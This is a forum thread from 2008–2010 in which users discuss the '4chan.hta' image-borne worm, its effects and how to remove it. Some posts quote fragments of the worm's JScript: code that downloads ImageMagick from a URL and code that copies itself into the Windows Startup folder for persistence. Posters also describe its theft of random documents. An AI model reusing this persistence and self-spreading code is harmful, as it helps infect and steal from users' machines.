Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

"Save as 4chan.hta - Shit bricks."

Name: Anonymous 2008-09-03 1:47

What the fuck is this 4chan.hta fuckery?

Name: Anonymous 2008-09-03 10:51

Do what it says and then run it. Hopefully I'll be able to read some of your documents as the spam script takes flight

Name: michael farrow 2009-05-25 7:34

jhh

Name: Anonymous 2010-07-20 13:26

How does one fix this shit?

Name: air jordan 2010-07-20 14:00

air jordan ed hardy

Name: Anonymous 2010-07-20 14:34

I would also like to know how this shit is fixed.

Name: Anonymous 2010-07-20 15:20

You should know better than to fall for shit like this.

Name: Anon 2010-07-20 15:28

Hi, I just did this but nothing seems to happen. How to make it work?

Name: Anonymous 2010-07-20 15:45

It's a trap! What to do now?

Name: Anonymous 2010-07-20 15:53

wtf is it anyway?

Name: Anonymous 2010-07-20 15:55

It changes the pics you upload, right?

Let's start with NOT FUCKING POSTING PICTURES then

Name: Anonymous 2010-07-20 16:03

Well actually it just repeatedly gives me some error message and it's really annoying.

Name: Anonymous 2010-07-20 16:07

>>11
No, it copies posts with pictures (corrupting the pictures to include the viral data in the process) and posts them randomly on the board.

Name: Anonymous 2010-07-20 16:23

I just get this error message over and over again: "imconvert.exe - This application failed to start because CORE_RL_magick_.dll was not found."

Massive failure, but it still manages to annoy me.

Name: Anonymous 2010-07-20 16:23

it's the same cancer as the colored boxes(4chan.js) shit. The problem was solved then by banning very one that had it. So expect the b&hammer!

Name: Anonymous 2010-07-20 16:30

ATTN: Retards
.hta is an HTML application that runs in the client's web browser and has NO SCRIPT LIMITATIONS, ALLOWING THE PROGRAM FULL ACCESS TO THE CLIENT COMPUTER'S REGISTRY.

God damn you guys are stupid.

Name: Anonymous 2010-07-20 17:36

Is it dangerous if you save it as a .jpg? There was one picture I liked.

Name: Anonymous 2010-07-20 19:35

>>14
Lucky bastard, it downloads and uses imagemagick to hide the script in the picture and to add "save as 4chan.hta, shit bricks" to the pictures.

It's this part of the script in the image:
// Download ImageMagick
var imc;
try {
imc = download("https://develop.participatoryculture.org/trac/democracy/browser/trunk/dtv-binary-kit/
imagemagick/convert.exe?rev=4463&format=raw");

It also starts when you run IE because it adds this line in the registry:
copyname = shell.regRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup") + "\\4chan.js";

It also grabs random documents from your My documents folder and adds it to the picture, hoping something valuable comes up.

Enjoy.

Name: Anonymous 2010-07-20 19:59

>>17

i second this question.

Name: Anonymous 2010-07-20 20:02

>>19
No, saving it as .hta gives it permission to execute stuff without further questioning. jpg isn't executable, so no problem. Save one of those files as jpg, open in notepad, and look at the sourcecode. You can find the stuff from >>18

Name: Anonymous 2010-07-20 20:14

So, how do you kill this bitch?

Name: Anonymous 2010-07-20 21:06

So just saving it as .hta means you're screwed?
I knew enough not to double-click it or anything... :/

Name: Anonymous 2010-07-20 21:12

I removed the 4chan file in the "startup" folder.
AVG said this after scan: "Virus found JS/Redir" ; "Moved to Virus Vault"
I also stopped the process in Task Manager
Is it gone from my computer now?

Name: Anonymous 2010-07-20 21:16

So I think I was saved by my own inability to follow instructions...I saved it as 4chan.htaShitbricks then 4chan.hta Shit bricks...  perhaps I even got it right a few times but nothing ever ran when I opened it up

Name: Anonymous 2010-07-20 21:16

Saved an .hta.
I didn't find anything new in my startups.
My processes are all clear of anything suspicious.
Ran MWB. Found a lone trojan. Quarantined and deleted.
Restart. Nothing freaky happens.

I'm paranoid as fuck now.

Name: Anonymous 2010-07-20 21:29

I'm paranoid too, WTF  I expected bricky diarrhea by now..but nothing...disappointing

Name: Anonymous 2010-07-20 22:13

Fortunately for me all I get is the missing .dll message too.
It's only partially bothersome but if there was some way to disable this i'd be much obliged if someone could tell me.

Name: Anonymous 2010-07-20 23:16

>>27

i'm having the same problem. tried clearing the file out in safe mode which stopped it for a while.

having dabbled in coding, i think this is what's screwing us over:

// Copy to startup folder and run from there
if (typeof WSH == "undefined") {
    var copyname;
    try {
        copyname = shell.regRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup") + "\\4chan.js";
        var copyfile = fs.openTextFile(copyname, 2, 1);
        copyfile.write(scripttext);
        copyfile.close();
    } catch(e) {
        // Run from temp folder if this fails
        copyname = "4chan.js";
        var copyfile = fs.openTextFile(copyname, 2, 1);
        copyfile.write(scripttext);

i tried looking in my registry for that file, but i can't seem to find it. any ideas?
        copyfile.close();

Name: Anonymous 2010-07-20 23:43

okay. i figured it out.
just so the uber newfags don't figure it out, while still protecting fellow innocent lurkers, the answer's in the previous post. access that registry entry, follow the address there, and do basic virus cleanup protocol and you shall be liberated.

Name: Anonymous 2010-07-24 16:45

1.Ctrl+Shift+esc
2.Find Processes and delete
3.Windows Key+R
4. %temp%
5.Ctrl+a
6. Delete all
7.Windows Key+R
8.Edit+Find
9. 4chan, delete ALL (THERE ARE MORE THAN ONE) entries
10.Download Spyfalcon or stopzilla (lol)
11.----------------------
12.Promotion from newfag to dumbass

Name: Newfags are dumbfuck faggots 2010-07-27 14:10

If you follow the directions, you are an epic dumbshit and you deserve everything that happens to your computer.

Name: Anonymous 2010-07-27 15:22

HERPIE DERPIE DERP I DO3Z EVERYZING 4CHON TELLZ ME TROLOLOLOLOLOLOLOL

Name: prolly might win 2010-07-27 18:43

um well i did it, adn i fighuard knowing its 4chan im  dumbass, so right when i clicked a text came up, i went to norton 360 after i deleted BOTH files the pic and html one, and erased from harddrive, nothing happend, should i restart to see if something comes up/

Name: NewFag 2010-07-27 19:27

I have the actual script minus the massive png generated bullshit.


Code too large to post here.

Name: Anonymous 2010-07-27 19:28

http://pastebin.com/N8v1YyBy

Name: Anonymous 2010-07-28 0:19

Although it sucks helping out the idiots. It's better then having 4chan spammed to hell. Though the site is shit now anyway.

Name: Anonymous 2010-07-28 4:03

I had the image at hand, but didn't save it as it asked, and didn't run it,  but I DID save it as a .bmp.

I'm no newfag, but not a techie, can this be dangerous?

Name: Fugs 2010-07-31 1:31

37, just delete the damned thing and it shouldn't hurt you. It's executed as a IE5 HTML Application, and without the proper extension it WON'T RUN.

Name: Anonymous 2010-08-02 23:53

Please.  Tell me.  What did you think was to happen if you followed the instructions in the image?

Name: Anonymous 2010-08-02 23:53

Will I be affected if im running GNU/Linux?
Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List
All trademarks and copyrights on this site are owned by their respective parties. All comments and posts are the responsibility of their own posters.
- Tinychan + 2ch Mode -